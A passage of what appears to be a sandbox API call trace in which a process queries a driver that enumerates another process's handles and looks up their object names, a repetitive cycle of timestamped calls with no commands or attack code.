Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003831a60, HandleInformation=0x0) returned 0x0 [0244.882] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.882] PsReleaseProcessExitSynchronization () returned 0x2 [0244.882] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.882] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.882] ObfDereferenceObject (Object=0xfffffa8003831a60) returned 0x1 [0244.882] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.882] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.882] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.882] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.882] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.882] PsAcquireProcessExitSynchronization () returned 0x0 [0244.882] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.882] ObReferenceObjectByHandle (in: Handle=0x178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.882] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.882] PsReleaseProcessExitSynchronization () returned 0x2 [0244.882] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.882] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.882] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.882] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.882] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.882] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.882] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.882] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.882] PsAcquireProcessExitSynchronization () returned 0x0 [0244.883] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.883] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ab57b0, HandleInformation=0x0) returned 0x0 [0244.883] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.883] PsReleaseProcessExitSynchronization () returned 0x2 [0244.883] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.883] ObQueryNameString (in: Object=0xfffff8a000ab57b0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.883] ObfDereferenceObject (Object=0xfffff8a000ab57b0) returned 0x2 [0244.883] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.883] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.883] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.883] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.883] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.883] PsAcquireProcessExitSynchronization () returned 0x0 [0244.883] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.883] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0244.883] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.883] PsReleaseProcessExitSynchronization () returned 0x2 [0244.883] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.883] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.883] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0244.883] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.883] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.883] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.883] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0244.883] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.883] PsAcquireProcessExitSynchronization () returned 0x0 [0244.883] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.883] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00135e760, HandleInformation=0x0) returned 0x0 [0244.884] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.884] PsReleaseProcessExitSynchronization () returned 0x2 [0244.884] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.884] ObQueryNameString (in: Object=0xfffff8a00135e760, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.884] ObfDereferenceObject (Object=0xfffff8a00135e760) returned 0x3 [0244.884] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.884] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.884] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.884] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.884] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.884] PsAcquireProcessExitSynchronization () returned 0x0 [0244.884] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.884] ObReferenceObjectByHandle (in: Handle=0x2cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0244.884] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.884] PsReleaseProcessExitSynchronization () returned 0x2 [0244.884] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.884] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.884] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0244.884] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.884] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.884] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.884] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0244.884] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.884] PsAcquireProcessExitSynchronization () returned 0x0 [0244.884] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.884] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003692340, HandleInformation=0x0) returned 0x0 [0244.884] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.885] PsReleaseProcessExitSynchronization () returned 0x2 [0244.885] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.885] ObQueryNameString (in: Object=0xfffffa8003692340, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.885] ObfDereferenceObject (Object=0xfffffa8003692340) returned 0x1 [0244.885] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.885] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.885] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.885] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.885] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.885] PsAcquireProcessExitSynchronization () returned 0x0 [0244.885] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.885] ObReferenceObjectByHandle (in: Handle=0x3bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800368f190, HandleInformation=0x0) returned 0x0 [0244.885] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.885] PsReleaseProcessExitSynchronization () returned 0x2 [0244.885] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.885] ObQueryNameString (in: Object=0xfffffa800368f190, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.885] ObfDereferenceObject (Object=0xfffffa800368f190) returned 0x1 [0244.885] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.885] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.885] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.885] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0244.885] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.885] PsAcquireProcessExitSynchronization () returned 0x0 [0244.885] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.885] ObReferenceObjectByHandle (in: Handle=0x480, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036d43c0, HandleInformation=0x0) returned 0x0 [0244.886] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.886] PsReleaseProcessExitSynchronization () returned 0x2 [0244.886] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.886] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.886] ObfDereferenceObject (Object=0xfffffa80036d43c0) returned 0x12 [0244.886] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.886] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.886] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.886] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.886] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.886] PsAcquireProcessExitSynchronization () returned 0x0 [0244.886] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.886] ObReferenceObjectByHandle (in: Handle=0x498, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036ca3d0, HandleInformation=0x0) returned 0x0 [0244.886] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.886] PsReleaseProcessExitSynchronization () returned 0x2 [0244.886] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.886] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.886] ObfDereferenceObject (Object=0xfffffa80036ca3d0) returned 0x1 [0244.886] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.886] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.886] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.886] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.886] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.886] PsAcquireProcessExitSynchronization () returned 0x0 [0244.886] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.886] ObReferenceObjectByHandle (in: Handle=0x49c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036c8730, HandleInformation=0x0) returned 0x0 [0244.887] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.887] PsReleaseProcessExitSynchronization () returned 0x2 [0244.887] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.887] ObQueryNameString (in: Object=0xfffffa80036c8730, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.887] ObfDereferenceObject (Object=0xfffffa80036c8730) returned 0x1 [0244.887] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.887] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.887] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.887] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.887] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.887] PsAcquireProcessExitSynchronization () returned 0x0 [0244.887] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.887] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036c8070, HandleInformation=0x0) returned 0x0 [0244.887] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.887] PsReleaseProcessExitSynchronization () returned 0x2 [0244.887] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.887] ObQueryNameString (in: Object=0xfffffa80036c8070, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.887] ObfDereferenceObject (Object=0xfffffa80036c8070) returned 0x2 [0244.887] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.887] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.887] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.887] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.888] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.888] PsAcquireProcessExitSynchronization () returned 0x0 [0244.888] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.888] ObReferenceObjectByHandle (in: Handle=0x4a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e6f070, HandleInformation=0x0) returned 0x0 [0244.888] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.888] PsReleaseProcessExitSynchronization () returned 0x2 [0244.888] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.888] ObQueryNameString (in: Object=0xfffffa8002e6f070, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.888] ObfDereferenceObject (Object=0xfffffa8002e6f070) returned 0x2 [0244.888] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.888] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.888] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.888] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.888] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.888] PsAcquireProcessExitSynchronization () returned 0x0 [0244.888] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.888] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036ce730, HandleInformation=0x0) returned 0x0 [0244.888] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.888] PsReleaseProcessExitSynchronization () returned 0x2 [0244.888] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.888] ObQueryNameString (in: Object=0xfffffa80036ce730, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.888] ObfDereferenceObject (Object=0xfffffa80036ce730) returned 0x1 [0244.888] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.889] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.889] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.889] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.889] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.889] PsAcquireProcessExitSynchronization () returned 0x0 [0244.889] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.889] ObReferenceObjectByHandle (in: Handle=0x4c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036fb730, HandleInformation=0x0) returned 0x0 [0244.889] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.889] PsReleaseProcessExitSynchronization () returned 0x2 [0244.889] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.889] ObQueryNameString (in: Object=0xfffffa80036fb730, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.889] ObfDereferenceObject (Object=0xfffffa80036fb730) returned 0x2 [0244.889] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.889] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.889] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.889] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.889] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.889] PsAcquireProcessExitSynchronization () returned 0x0 [0244.889] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.889] ObReferenceObjectByHandle (in: Handle=0x4c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036ea070, HandleInformation=0x0) returned 0x0 [0244.889] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.889] PsReleaseProcessExitSynchronization () returned 0x2 [0244.889] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.889] ObQueryNameString (in: Object=0xfffffa80036ea070, 